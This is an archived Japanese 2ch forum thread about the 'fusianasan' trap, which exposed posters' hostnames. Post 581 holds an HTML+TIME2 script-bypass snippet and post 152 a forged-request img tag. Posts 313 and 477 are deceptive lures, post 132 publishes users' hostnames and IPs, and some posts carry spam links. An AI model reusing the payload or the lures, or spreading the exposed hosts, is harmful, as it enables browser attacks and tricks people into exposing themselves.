完璧に勝手になんでも処理してくれればまだいいが、
それが不完全だからややこしい。
勝手に処理されると、トラブルが起きたときに
何が悪いのかもわからないし
どうにもならなくなる。

132 :
この間のテロ実行犯名と昨日のテロ実行犯&一連のテロ首謀者の名が
わかったのでここにも晒し上げます。
この間のテロ実行犯
fw1.eng.nsc.co.jp.経由の者
さらに、p7009-ipad11maru.tokyo.ocn.ne.jp、
tn2-am222.ppp.ttcn.ne.jp、pl252.nas911.kobe.nttpc.ne.jp 、
e177122.ap.plala.or.jp経由の者どもです。
昨日のテロ実行犯&一連のテロ首謀者名
ab242021.ot.FreeBit.NE.JP、NKDfa-01p1-190.ppp11.odn.ad.jp 、
zaq3dc04c20.zaq.ne.jp.、cm105.ai6.catvnet.ne.jp.、
nttkgsm005025.flets.ppp.infoweb.ne.jp、
216.105.193.143 、cache4.cty-net.ne.jp、
G052095.ppp.dion.ne.jp経由の者などです。
おそらく一連のテロ首謀者はp34-dna01oogakini.gifu.ocn.ne.jp、
zaqd37ca835.zaq.ne.jpらです。

133 :
聞きたいんだけど、カキコしてたら個人情報がバレたんだ。
なんでバレたんだろう?

134 :
>>124
見れまシタ。意味理解。サンクス。
・・・・ヤパーリIEは楽しいな。。
穴空く度に色々教えてもらえる(w
そういう意味では初心者向けだYo-
ち、違うのか?

135 :
nsc.co.jpってどこかと思ってwhoisしたら、
Nippon Steel Corporation
か。
誰かがクビになるのかな…

136 :
ガスの元栓を閉めるみたいにScriptを無効にしてしまうとWindows全体に影響が
出てしまうみたいですね。フォルダーをWebで表示みたいなのはfolder.httみたい
なスクリプト主体のHTMLでコントロールしている。
で今回のことを例えると、玄関の戸は閉まっているようです、鍵がないと開きません。
それで結局、脇に回ると、勝手口があって、そこには鍵は付いていない、
さらに調べてみると、玄関は実は鍵がかかっているように見えるけど、
壊れていていろんな鍵でも開く、というところでは。

137 :
>>134
SamSpade入れると簡単に見れるよ、ほかにnslookup,whoisとかインターネットの
管理に必要なものはいろいろ付いている。ZoneAlarmの無料版の人はこれで、
調べるとよい。自サイトの掲示板いたずら書きとか、spamメールの発信元
調べたりとかの時にも… Windows用 ↓
http://samspade.org/ssw/download.html

138 :
玄関の鍵は中から、
勝手口の鍵は外から開く

139 :
水を飲もうと蛇口を開くとガスが出るとか、下水が出るとか、
TIME2はなんだろう… とびらを開けているのに回(動く)る電子レンジとか。
そう言うバグのある電子レンジないのかな(笑)
以前昔の電子レンジ調べたときは、とびらを開けている間はマグネトロンに電気が
流れると電源がショートしてレンジ内のヒューズが飛ぶような仕組みになっていた。
水を止めても火が消えない湯沸かし器も怖そう。これは爆発事故とかあるらしいが…

140 :
たまに、鍵を掛けると開かなくなり、
住人が閉め出されます。
# そんなバグもあったような。

141 :
HTML+TIME2は、スクリプトがOFFでも、
一部のスクリプトによる機能を実現でき、
戸の鍵がかかっていても、郵便物を受け取ることができる、
アパートの戸に付いてる郵便受けみたいなものです。
ただHTML+TIME2では、郵便受けの穴が大きすぎて、
そこから手を突っ込んで鍵を開けられてしまうのが問題。

142 :
API上は「ビヘイビアOFF」という指定があるのに
どうしてオプションとして提供されてないんでしょうか。

143 :
>>142
これのことかな?
ttp://memo.st.ryukoku.ac.jp/archive/200112.month/2432.html
詳細設定の「マルチメディア→Webページのアニメーションを再生する」のチェックを外す

144 :
で、MSの反応はどうなってるんだ?
無視か?
なら、スクリプトばらまいて実力行使か?
# 俺はやりたくない。

145 :
やっと気が付いたようだな。
ttp://headlines.yahoo.co.jp/hl?a=20011223-00000003-vgb-sci

146 :
>>144
海外VIRサイトにリークすれば。。
連中大喜び。。
自分の手は汚さない。コレ鉄則(w

147 :
たしか 大企業なんかで
Nimda騒ぎの際に IE使用禁止令を出したとことかあったよ。

148 :
https://www.netsecurity.ne.jp/article/1/3582.html

149 :
これは、はるか昔にtcupやminibbsで流行った荒らしの改良版か?
絶滅したと思っていたが、こんな方法がまた使えるとは・・・・

150 :
>これは、はるか昔にtcupやminibbsで流行った荒らしの改良版か?
>絶滅したと思っていたが、こんな方法がまた使えるとは・・・・
今では、ほとんどの掲示板で対策済みだろうから、
2chでも対策済みかと思ったがそうでなかった。
こんなヘボイ手が2chで通用するなんて正直驚いたw

151 :
>>149
>>150
はるか昔は、どんなスクリプト使ってたの??
教えてくらさい。

152 :
<img src="http://www.server.url/bbs.cgi?・・・・>
みたいなの。他にもいろいろある。
でもRefererチェックするようになって使えなくなった。
しかし「携帯から書き込みできる掲示板はReferer
チェックしない」というのと、gifに偽装させると
いうのはスゴイ!!!
仕掛けた人、天才だとおもう

153 :
かなりいろいろ勘違い

154 :
>>152
こりゃ、読んでる俺のほうがはずかしくなるほどの理解力だ

155 :
やっぱりどっかにスクリプトばらまこうぜ(W

156 :
>>155
自分でやれ! どこの掲示板攻撃するのだ?

157 :
やだ(藁
タイーホされたくない。

158 :
>>149-150
ひろゆきか誰かがふしあな対策のために昔の規制をフカーツさせたってどっかで言ってたよ。
最近はimode用に規制解除してたんでしょ。

159 :
>>158
てゆーか、hostがdocomo.ne.jpの時だけ規制解除すれば済むでしょ。
試してないけど規制ふかーつしたの?

160 :
>>153、154
何年か前、一厨房やってたにすぎないから
深くつっこまないでくれw
駄文晒してごみんね。

161 :
パッチでない?age

162 :
http://pc.2ch.net/test/read.cgi/sec/1007036606/788-791

163 :

2chでの自作自演がばれたやつがいたんだね(w
http://game.2ch.net/test/read.cgi/game/1007835254/71-

164 :
   
    

165 :
ふーむ、また新しいのが見つかったようですな。
http://memo.st.ryukoku.ac.jp/archive/200201.month/2656.html

166 :
結局放置プレイかYO!

167 :
http://bom-ba-ye.com/a.cgi?netapp=1

168 :
リモホさらすと危険なのか?

169 :
>>168
その内お歳暮が届くぞ

170 :
まじで?

171 :


172 :


173 :
よーし、パパは新しいfusianasanトラップでクッキー抜いちゃうぞー。

174 :
お歳暮かぁ。

なんで知らない人にお歳暮贈るのだろう。なぞだ。



175 :
te

176 :
test

177 :


178 :
ura2ch

179 :
e

180 :


181 :
なかなかdat逝かないもんだな。

182 :
結局 ふしあなさんトラップの回避の仕方って 何?

183 :
無闇にリンクをクリックしない。

184 :
guest

185 :
2ちゃんねる」を襲った「fusianasanトラップ」の実態
http://www.watch.impress.co.jp/internet/www/column/security/0307.htm

186 :
ura2ch
guestguest

187 :


188 :
ura2ch
guestguest

189 :
ura2ch
guestguest
千代田区千代田1番地

190 :
ura2ch
guestguest

191 :
test

192 :
ura2ch
guestguest

193 :
     |Д`)
     |⊂  ダレモイナイオドルナライマノウチ
     |     

           Å
       ♪ / \
     ♪  ヽ(´Д`;)ノ ランタ ランタ
         (  ヘ)   ランタ タン
          く     ランタ タンタ
                 タン
          Å
     ♪   / \
        ヽ(;´Д`)ノ ランタ ランタ
      ♪  (へ  )   ランタ タン
            >   ランタ タンタ
                 タン

194 :
uso2ch
gesogeso

195 :
ura2ch
guestguest

196 :


197 :
>>1
あおってるの?

198 :
           Å
       ♪ / \
     ♪  ヽ(´Д`;)ノ ランタ ランタ
         (  ヘ)   ランタ タン
          く     ランタ タンタ
                 タン
          Å
     ♪   / \
        ヽ(;´Д`)ノ ランタ ランタ
      ♪  (へ  )   ランタ タン
            >   ランタ タンタ
                 タン

199 :
 このちょっとうえの 185の インプレスへのリンクは偽者で fusianasa
トラップそのものです。 決して踏まないように! (踏む前に下にでるURLをみてごらん ! リンク先は インプレスではないよ! )
 最近「通信技術」板で fusianasanトラップを踏んでしまった人がたくさ
んいるようです。(かなりのポストがホスト名抜かれてます) 私もその一
人です。 MAC OS 9.2 + Netscape 6 でも被害を受けます。
 怪しいリンクは踏まないのが肝心だけど、ふんだ場合も、大丈夫な対策
法をどなたか教えてもらえませんか?
を受けます。

200 :
>>199
http串に頼らず、抜かれても危険性がないとこ利用すればいいだけのような気が。

201 :
>>199
春厨は黙ってなさい。

202 :
ura2ch
guestguest

203 :
ヘクション
ヘクション

204 :
            (⌒⌒⌒⌒⌒⌒⌒⌒⌒⌒⌒⌒⌒⌒⌒⌒⌒
            ( >>185は本当にfusianasaトラップ
          O  ( を解説しているだけだろ>>199
        ο   ( 糞レスしたうえに糞スレまで立ててんじゃ
        。    ( ネーヨ!ボケ なんて言えないよな〜
___∧_∧__  〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜
   ( ;´Д`)
――(    )―┘、          ドンゾコデチ!     イナカ!!
‐――┐ ) )――┐         ≡≡∧,,∧   ≡≡∧ ∧
    (__ノ__ノ    . |         ≡≡ミ,,>∀<ミ ≡≡(,,・∀・)
                     ≡≡ミ_u,,uノ  ≡≡ミ_u,,uノ
                   "~"    """  :::     "~""~"

205 :
害吉は放置で

206 :
MLのアーカイブ
http://memo.st.ryukoku.ac.jp/archive/200201.month/2656.html
にこの Cookie を利用したトラップの解説があるよ。

207 :
199です。ごめんなさい。 199の記事は勘違いでした。どうも、すみません。

208 :


209 :
ある板に、fusianasanトラップ仕掛けたいんだけど、どうすればいい?。

210 :
>>209 まずロープを買って来い。

211 :
ura2ch
guestguest

212 :
>>211
こういうやつですか?

213 :
ura2ch
guestguest

214 :
age

215 :
なぜ、あげる?

216 :
TEST

217 :
トトロ

218 :
b

219 :
TEST

220 :
TEST

221 :
TEST

222 :
TEST

223 :
ts

224 :
ura2ch
guestguest

225 :
(;´Д‘)ハァハァ

226 :
フュージアネイザン

227 :
test

228 :
fusia nasan
フュージア ネイザン(露)

future net
フューチャー ネット(英)

未来のネット(和)

229 :
ura2ch
guest guest male
たこ焼き機

230 :
fusianasan って、たしか電影少女★のキャップだったんですよね?

231 :
>>230
yes

232 :
fusianasanって何なの?
どっかのスレッドにメールアドレスを
fusianasanにすると裏2ちゃんに
行けるとかいってたけど何か関係あるの?

233 :
Fusianaについて↓

http://www.2ch.net/guide/faq.html#G5

234 :
有り難うです。

235 :
ほ〜。

236 :


237 :
なぜ、またageる? と小一時間(w

238 :
また抜いてるな(w
またageちまったぃ

239 :


240 :
ura2ch
guest guest

241 :
キタ━━━( ´∀`)・ω・) ゚Д゚)・∀・) ̄ー ̄)´_ゝ`)゚∀゚)´-`)━━━!!!!

242 :
えらい fusiana はやってますね

243 :
やってみました。

244 :
やってみました。

245 :
いかが?

246 :
testtest

247 :
test

248 :
test


249 :
test

250 :
test

251 :
test

252 :
test

253 :
TEST

254 :
kintamanko

255 :
test

256 :
guest guest

257 :
test

258 :
fusianasanできない・・・・・・・なぜ?

259 :
guest guest

260 :
aaa

261 :
chinpo

262 :
test

263 :
fusianasan

264 :
そうだ、個人情報を抜く悪辣なトラップに天誅を!!!

265 :
fusianasan

266 :
test


267 :


268 :
fusianasan

269 :
モー娘おたの場所みたい。キモ悪〜
http://anc53998.cool.ne.jp/cgi-bin/

270 :
てst

271 :
Mr. T

272 :
Reffrer何とかしてセット出来ないかなあ・・・
invisible怖いわマジで、セキュリティレベル関係無し
これとmhtmlの受動攻撃併せたら何でも出来ちゃうぞ
ブラウザはこれからも鬼門だな

273 :
guest guest ura 2ch ni ikemasuyouni
http://kame.tadaima.com/2ch/

274 :
?

275 :
http://homepage2.nifty.com/v7437/img-box/img20020801155000.gif

276 :
あれ?

277 :
fujianasan

あれ?ダメじゃん♪

278 :
自分自身のfusianasanをURLに入れたらルータにアクセスできまちた

279 :
test

280 :
test


281 :
test

282 :
いい加減 IE も MIME Type に基づいた挙動をしてほしいよなぁ。
あ、たしかレジストリいじったら MIME Type に忠実になるんだっけ。
これはバグだと思うんだけど、長年直されていないところを見ると仕様なんだろうなぁ。

283 :
test

284 :
?


285 :
ふしあなさんをすると、攻撃をうけやすくなったりするの?

286 :
R。

287 :
>>286
きゃーお巡りさ〜ん

288 :
てすと

289 :
もういっかい

290 :
晒されちゃった・・・。
もうだめぽ

291 :
age

292 :
テスト

293 :
test

294 :
eest

295 :
晒されるかな?

296 :
test

297 :
何だこれ?

298 :
192.168.0.1

299 :
guest guest

300 :
 

301 :
てす

302 :


303 :
まぁーだ、やってんの?

304 :
age


305 :
fusianasan

306 :
Hello, world.

307 :
できません(w

308 :
>>307
「i」が全角だからだよ

とマジレスのテスト

309 :
てす

310 :
test

311 :
対処しろよ
おれのIPが不確定大勢にみられて損するだろうが

312 :
(・∀・)カエレ!

313 :
123 :名無しさん@Before→After :02/10/05 10:03 ID:aI4+QOck
書き込む前にSG(セキュリティー・ガード)に登録しないと危険ですよ。

でないと簡単にあなたのIPアドレス等抜かれ、住所まで公開された人も
数多くいます。それが2ちゃんねるの隠れた素顔でもあります

SGに登録する方法は、名前欄に「 fusianasan 」と入れメール欄にはあなたの
メールアドレス(フリーメールは弾かれます)を入力、本文欄にあなたの設定したい
パスワードを書いて通常通り書き込みボタンを押します。これでSGの登録は完了です

2ちゃんねるはルールさえ守れば危険な場所ではありません。
しかし悪意を持った人間も確かに存在します。気を付けて下さいね。

fusianasanは、正式にはフュージャネイザンと読みます。元々はアメリカの学生達の
間で、チャットの時にセキュリティを強化する為に開発されたシステムです。

悪意のある人間にクラックされる前にSGを施す事をお勧めします


↑これもトラップでそか???



314 :
トラップ一家物語という話がある。
富豪の家に教育係として来た音楽好きが、
家にトラップを仕掛けまくるという心温まる話だ。

315 :
>>314 音楽の授業の時あの映画見たけどなんかおもしろかったよ。

316 :

映画はサウンドオブミュージック
トラップ一家は大昔にやってたアニメ

317 :
フジアナなっちゃん

318 :
引っかかるかな

319 :
testplay


320 :
これでよし!

321 :
メール欄にfusianasanって書いたらだめだよ!
>>319-320
みたいにホストがでるよ。ホストがわかるとIPもわかるから、
直接アクセスさせるよ!

322 :
>>319-320
にアクセスしてもだめだよ。

323 :
>>321
させるのかよ!

324 :
てす

325 :
gsdffads

326 :
フュージャネイザン!
フュージャネイザン!!
フュージャネイザン!!!

327 :
>>282 どこ弄るの?

328 :
シマッタ!!
トラップにはまった!!

329 :
よっしゃ!

330 :
jskdjdjlakyfdhf

331 :
tes

332 :
test

333 :
test2

334 :
test

335 :
ぐぁぁぁ

336 :
おまいら学習能力ないんか

337 :
test

338 :
&rf&rusi&ran&ras&ran
確かこんなのもあったような

339 :
p@p

340 :
おk。

341 :
てすと

342 :


343 :
info@face-kyowa.co.jp

344 :
dion

345 :
!

346 :
なんだこれ

347 :
こんにちは私は横田めぐみです。

348 :
>>347
こんにちは

349 :
北の国から2005 -蘇生-

350 :
ytd


351 :


352 :


353 :
fujianasan

354 :
R

355 :
fusianasan

356 :
で?

357 :


358 :


359 :


360 :
glycerin19770313

361 :
これでいいのかな?

362 :
mんmん

363 :


364 :
are?

365 :


366 :
てすつ

367 :
aa

368 :
なんでみんなIP晒してんの?
危ないし

369 :
99

370 :
2get!

371 :
ウワァァァァァァァァァァン!!!
フュージャネイシャン怖いよママン゚(゚´Д`゚)゚。

372 :
skjalks;f

373 :
タブブラウザとかでfusianasanをはじくようにならないのかな?
before_navigateでひっかけりゃいいんだけど。
自分で作るのうぜえええええええええので。

374 :
別にIPなんて表面で見えないだけで実際は普通に晒してるんだから良いよ

375 :
guest guest

376 :
test

377 :
test

378 :
狼はデフォがフシアナだから・・・
初心者がはまる罠

379 :
____       ________             ________
|書き込む| 名前: |            | E-mail(省略可): |              |
 ̄ ̄ ̄ ̄        ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄              ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
         ∧_∧   。   / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
        (  ・3・) / < ここに『fusianasan』と
        (つ  つ    | 入れるといい事が起きるYO
       | ̄ ̄ ̄ ̄ ̄|   \_____________
       |          |
       |          |
  | ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄|

380 :
ncnt.ncn-t.net

381 :
直接アクセスされるとどうなるんでつか?
他の板で晒しちまった・・・鬱だ

382 :
guest guest

383 :
>>381
パソコン破壊されたり
悪戯電話が頻繁に掛かってきたり

384 :
ふーん・・こうなるんだ

385 :
じゃあ、もう一発

386 :
つーかほんとみんなIE(とIEコンポタブブラウザ)使うのやめなよ…。

387 :
  ↑この辺に出てるかな?

388 :
test

389 :
てすto

390 :
guest guest

391 :
(´・ω・`)

392 :
(^^)

393 :
LOW guest

394 :
test

395 :
test

396 :
test

397 :
test
hosting-x.com

398 :
どうせこんなのネタだろ
実際みたけど何もなかったモン。

399 :
マネー

400 :
400げっとぉぉぉぉぉぉぉぉぉぉぉぉぉぉぉぉぉ

401 :
Unauthorized

402 :
Payment Required

403 :
Forbidden

404 :
Not Found

405 :
test

406 :


407 :
tes

408 :
テスツ

409 :
てす

410 :
どうなるの?

411 :
test

412 :
dcd

413 :
test

414 :
tes

415 :
http://fusianasan.2ch.net/

416 :


417 :
test

418 :
はいはい

419 :
みんな何してるの?

420 :
荒らしとして報告しました…

421 :
(^^)

422 :
&rf&rusi&ran&ras&ran&rrlo;乱用ダメ。。
これってfusianasanなの?

423 :
&rfsui;

424 :
test

425 :
test

426 :
や ま さ き わ た る

427 :
test

428 :
t e s t

429 :
4

430 :
test

431 :
test

432 :
テストは、
セキュリティ板総合テストスレッド
http://pc.2ch.net/test/read.cgi/sec/1036771511/l50でやれ。
■■■■■■■■■■■■ 終了 ■■■■■■■■■■■■

433 :
■■■■■■■■■■■■test■■■■■■■■■■■■

434 :
aaa

435 :


436 :
fusianasanは、正式にはフュージャネイザンと読みます。元々はアメリカの学生達の
間で、チャットの時にセキュリティを強化する為に開発されたシステムです。

437 :
karaage

438 :
test

439 :
hello

440 :
u

441 :
テストは、
セキュリティ板総合テストスレッド
http://pc.2ch.net/test/read.cgi/sec/1036771511/l50で。
■■■■■■■■■■■■ 終了 ■■■■■■■■■■■■

442 :
なんでしょ

443 :
何でしょ

444 :
あぼーん

445 :
危険

446 :
http://www2.leverage.jp/start/

447 :
guest/guest

448 :
(^^)

449 :
372get!

450 :
友達の家でインターネットをやるとやりたくなる

451 :
>>450
相手の友達もいい友達を持ったモンだ(w

452 :
fusianasan

453 :
どこのカフェでしょう?

454 :
test

455 :
test

456 :
test

457 :
せめてsageでやれ。
テストは
セキュリティ板総合テストスレッド
http://pc.2ch.net/test/read.cgi/sec/1036771511/l50で。

458 :
   ∧_∧
  (  ^^ )< ぬるぽ(^^)

459 :
保守age

460 :
dokoooo

461 :


462 :
age

463 :
are

464 :
test

465 :
某掲示板でfusianasanと名前をして書き込みをしてしまいました。
これいったい何なんでしょうか?
なんか怖いです。。

466 :
>>465
それはfusianasanトラップとは言いません。

467 :
>>466
じゃぁへいきですか?

468 :
IPアドレスがソースで出ないサイトは
どのようにしてIPアドレスを
調べてるんですか??

469 :
>>468
マルチポストすんなヴォケ

470 :
>>467
どういう思考をしたら平気だという結論になったんですか?

471 :
マルチポスト?
?
?
わかりません。

472 :
>>471
いい加減に自分で調べる癖をつけましょう
http://www.google.co.jp/search?num=50&lr=lang_ja&q=%83%7D%83%8B%83%60%83%7C%83%58%83%67

473 :
>>472
見ました。ごめん名謝意。
でも、これはわからない

IPアドレスがソースで出ないサイトは
どのようにしてIPアドレスを
調べてるんですか??

474 :
今日は厨房が多いなぁ

475 :
多いよ。

476 :
おすすめサイト一覧です☆
http://accessplus.jp/staff/in.cgi?id=10645
http://www.39001.com/cgi-bin/cpc/gateway.cgi?id=neat
http://www.emzshop.com/goodstyle/

477 :
ここで無責任な発言をする人って、何者か興味ありません?
時々、IPの抜き方を知りたがっている人がいるんですが、
やり方を知らない人が意外と多いみたいですね。
名前欄に
------
steal@fusianasan
------
とだけ書いて、
本文の1行目以降に知りたい書き込みの発言者名と発言番号を書きます。
--- 例 ---
名無しさん 1
---------
こうすると、そのスレッドの番号の発言者のIPを
抜くことが出来ます。
うまくいかない時もあるので何回かやってみてください。
その書き込みはログとして書き込んだ本人には見えますが、
他の人には見えないので安心してください。
初期の頃の2ちゃんねらーならみんな知ってると思いますが、
最近の人は知らないですよね???
------------------------------------------------------------------------

478 :
http://homepage.mac.com/ayaya16/

479 :
本文に「accesplus.jp/staff」を半角で入れると強制fusianasanになります

480 :
↑スペル間違えた
本文に「accessplus.jp/staff」を半角で入れると強制fusianasanになります

481 :
.jp/staff
こうなります

482 :
z

483 :
access

484 :
accessplus

485 :
.jp/staff

486 :
accessplus.jp/plus

487 :
.jp/staff

488 :
guestguest

489 :
.jp/staff

490 :
━―━―━―━―━―━―━―━―━[JR山崎駅(^^)]━―━―━―━―━―━―━―━―━―

491 :
質問↓これってなんですか?(初心者) 477

492 :
sage

493 :
guest guest

494 :


495 :
accessplus

496 :
accesplus

497 :
名前に山崎渉といれると強制fusianasanらしい

498 :
YahooBB218112060130.bbtec.net 497

499 :
いつでも激安
安心して24時間お買い物ができる!
セルビデオ店が近くにないお客様も気軽にお買い物を楽しめます。
http://www.net-de-dvd.com/
安心確実
お支払は安心の代金引換です
振り込んだのに商品が届かない等
の心配は無用!
http://www.net-de-dvd.com/

500 :
accessplus

501 :
accessplus.jp/plus
ついでに500ゲト

502 :
tesuto

503 :
accessplus.jp/staff

504 :
.jp/staff

505 :
http://homepage.mac.com/yuuka20/

506 :
.jp/staff

507 :
いつでも激安
安心して24時間お買い物ができる!
セルビデオ店が近くにないお客様も気軽にお買い物を楽しめます。
http://www.net-de-dvd.com/
安心確実
お支払は安心の代金引換です
振り込んだのに商品が届かない等
の心配は無用!
http://www.net-de-dvd.com/

508 :
http://homepage.mac.com/hiroyuki44/hankaku06.html

509 :
accesplus.jp/staff

510 :
.jp/staff

511 :
.jp/staff

512 :
質問↓これってなんですか?(初心者) 477

513 :
(・3・) 〜♪

514 :
513

515 :
この前、初心者の質問板で
「セキュリティーガード」は名前の欄に
fusianasanといれればいい。とかかれてました。
みんなひかっかってました。悔しいです!
どうにかしてそういうやつを無くしたいです!

516 :
はい、初心者の質問板http://etc.2ch.net/qa/に帰ってね。
古いスレあげんじゃねーぞ、R。

517 :
2chのスレッドじゃない場合は、どう抜くんでスカ?(・∀・;)

518 :
>>517
消えろ

519 :
l

520 :
http://homepage.mac.com/hiroyuki44/jaz09.html

521 :
http://homepage.mac.com/hiroyuki44/jaz09.html

522 :
http://homepage.mac.com/hiroyuki44/jaz09.html

523 :
http://homepage.mac.com/hiroyuki44/jaz09.html

524 :
http://homepage.mac.com/hiroyuki44/jaz09.html

525 :
443 hiro

526 :
http://homepage.mac.com/hiroyuki44/

527 :
524:?:

528 :


529 :
fusianasan

530 :
今日がんばって作ったよ!いいのたくさん集めたから見てね!
http://www3.free-city.net/home/espresso/adult/xxx.html

531 :
↑糞R業者

532 :
ぎゃー

533 :
何してんの?

534 :
http://homepage.mac.com/hiroyuki44/jaz09.html

535 :
test

536 :

 __∧_∧_
 |(  ^^ )| <寝るぽ(^^)
 |\⌒⌒⌒\
 \ |⌒⌒⌒~|         山崎渉
   ~ ̄ ̄ ̄ ̄

537 :
 

538 :
?

539 :
テステス

540 :
test

541 :
てst

542 :
acccesplus.jp/staff

543 :
test

544 :
こんなに見えちゃってヤバクない???
抜いても抜いてもRしっぱなし・・・
 ↓ ↓ ↓
◆◇◆◇ 海外サイトだから安心R ◇◆◇◆
http://upbbs.s2.x-beat.com/linkvp/linkvp.html
http://upbbs.s2.x-beat.com/linkvp/linkvp.html
◆◇◆◇ 本気汁丸出しのお○○こが! ◇◆◇◆

545 :
.jp/staff
こうなります

546 :


547 :
ah4214

548 :
test

549 :
tesuto

550 :
     ∧_∧  ∧_∧
ピュ.ー (  ・3・) (  ^^ ) <これからも僕たちを応援して下さいね(^^)。
  =〔~∪ ̄ ̄ ̄∪ ̄ ̄〕
  = ◎――――――◎                      山崎渉&ぼるじょあ

551 :
テスト

552 :
http://homepage.mac.com/hiroyuki44/

553 :
http://homepage.mac.com/hiroyuki44/hankaku08.html

554 :
testtest
wara

555 :
wara

556 :
test

557 :
test

558 :
pest

559 :
pest

560 :
んん?

561 :
てちと

562 :


563 :
    (⌒V⌒)
   │ ^ ^ │<これからも僕を応援して下さいね(^^)。
  ⊂|    |つ
   (_)(_)                      山崎パン

564 :
test

565 :
test

566 :
どーでもいいが>>544は素人みたいなサイトだな。
金取るならもっと見やすいの作れやクソが。

567 :
tes

568 :
test

569 :
山崎渉 490

570 :
てすちお

571 :
新トラップ。このURLには注意。
リファラ見なくなったお陰で復活したらしい。
ttp://www.geocities.co.jp/SiliconValley-Sunnyvale/3011/index.html

572 :
tes

573 :
てすと

574 :
拡張子jpgのファイルは危険。JavaScript無効にするかIE以外のブラウザで開くべし。
スレ乱立中。
下痢トラップをどうにかしてください
http://qb.2ch.net/test/read.cgi/operate/1062969876/l50
575 :あぼーん:あぼーん
あぼーん

576 :
IE累積的な修正プログラムを当てておけば動作しないと思っていた。違うの?

577 :
てすと

578 :
フシアナトラップって2年前からあったのかー
マジで知らんかった

579 :
最近レスがめっきり減ったこのスレも
今日の騒ぎでカキコが多い。
祭りの予感…

580 :
>>576
スクリプトをOFFにしてない奴がそれだけ多いってこと。
「OFFにしろ」と言ったところで始まらない。

581 :
<xml:namespace prefix=t />
<?import namespace=t implementation=#default#time2 />
<t:set id=set1 to='' attributeName=document.parentWindow.execScript(scr1.innerHTML),set1.outerHTML />
</noscript>
これ追加するとスクリプトオフでも強制的に実行されるらしんだがどうなったの?

582 :
>>581
それは昔の話。対策パッチも出てる。
この間の奴は、2chの鯖の設定が甘くなったところにつけこまれた。

583 :
582

584 :
test

585 :
ヽ(`∀´)ノ test!!

586 :
フシアナサン対策パッチ配布
http://www.union-jp.net/home/yukino-t.html

587 :
>>586
クリックしてime.nu開→リンクのソースを開く(v)→(^_^;

588 :
.jp/staff

589 :
fusianasanと名前欄に入れたらどうなるんですか?
入れてしまったのですが…

590 :
test

591 :

名無しさん@お腹いっぱい。566

592 :
お前らフシアナサンの心配よりウイルスの心配しとけよ

593 :
 __∧_∧_
 |(  ^^ )| <寝るぽ(^^)
 |\⌒⌒⌒\
 \ |⌒⌒⌒~|         山崎渉
   ~ ̄ ̄ ̄ ̄

594 :
???

595 :
test

596 :
test

597 :
初心者です。これってどうやって仕掛けるんですか?
ハカーの人、教えてください。

598 :
>>597
fusianasanと名前欄に入れると仕掛け方が表示されます。

599 :
test

600 :
test

601 :
>>600
札幌中央卸売市場の方いらっしゃいませ

602 :
>>601
( ・∀・)アヒャ

603 :
test

604 :
名無しさん@お腹いっぱい。 602

605 :
:+uKn0nwE

606 :
P211018237072.ppp.prin.ne.jp

607 :
uKn0nwE

608 :
+uKn0nwE

609 :
:+uKn0nwE

610 :
P211018237072

611 :
:+uKn0nwE

612 :
:+uKn0nwE

613 :
g

614 :
n

615 :
s

616 :
:JUuj+ZGp

617 :
test

618 :
TEST

619 :


620 :
301ゲット

621 :
テスト

622 :
テスト

623 :
てす

624 :
tes

625 :
tes

626 :
tes

627 :


628 :
a

629 :
Tes.

630 :
test

631 :
( ゚Å゚) なんだここ?

632 :


633 :
fusianasan

634 :
みやぎーみやぎー

635 :
fusianasan

636 :
テスト

637 :
テス

638 :
あぼーん

639 :
キタ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┏━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┏━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┏━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┏━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
┗━━━━━━━━━━━━━━━━━━━━━━ゲホゲホッ・・・キ,キタ━━━━━┓
┏━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┏━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━(゚∀゚)━!!!

640 :
てす

641 :
TEST (プライベートIPだから、面白くないけど)

642 :


643 :
test

644 :
てすと

645 :
t

646 :
 

647 :
テスト

648 :
山崎渉とfusianasanには要注意

649 :
guest guest

650 :
test

651 :
ゆちゅつyt

652 :
テスト

653 :
(゚Д゚)ハァ?

654 :
test

655 :
test

656 :
test2

657 :
福岡県民は暇なのかな

658 :
てすと

659 :
&rf&rusi&ran&ras&ran

660 :
a

661 :
test

662 :


663 :
 

664 :
そんなにDIONユーザーだとアピールしてくれなくてもいいのですよ

665 :
テスト

666 :
ここはみんなでIP晒すスレですか?

667 :
まぁハッキングなんて不可能だろ?

668 :
おみくじ

669 :
<>

670 :
タミフルくれ

671 :
名無しさん@お腹いっぱい。500

672 :
てすと

673 :
>>670
インフルエンザですか?
おだいじに…

674 :
tes

675 :
test

676 :
test

677 :
test

678 :
fusianasan

679 :
tttt

680 :
test

681 :
てすと

682 :
o181189.ap.plala.or.jp


683 :
194 名前:名無しさん?[sage] 投稿日:04/02/16 18:22 ID:???
http://uploader.org/normal/data/up1774.jpg
http://uploader.org/normal/data/up1773.jpg
http://uploader.org/normal/data/up1772.jpg
http://uploader.org/normal/data/up1771.jpg
http://uploader.org/normal/data/up1769.jpg
http://uploader.org/normal/data/up1768.jpg
http://uploader.org/normal/data/up1767.jpg
http://uploader.org/normal/data/up1766.jpg
しかしなんであんなブスが水着にもならなくて、可愛い女の代表みたいな顔してて
こんな可愛い娘がRまでしっかり見せてくれるんだろう
お願いします

684 :


685 :
テス

686 :


687 :
えい

688 :
エイ

689 :
?

690 :
ホレ

691 :
ふふふ

692 :
to-

693 :
マルコ

694 :
g

695 :
「不氏唖那散(fusianasan)だとぅ!!」
「知っているのか雷電!」
「うむ……」
『不氏唖那散』
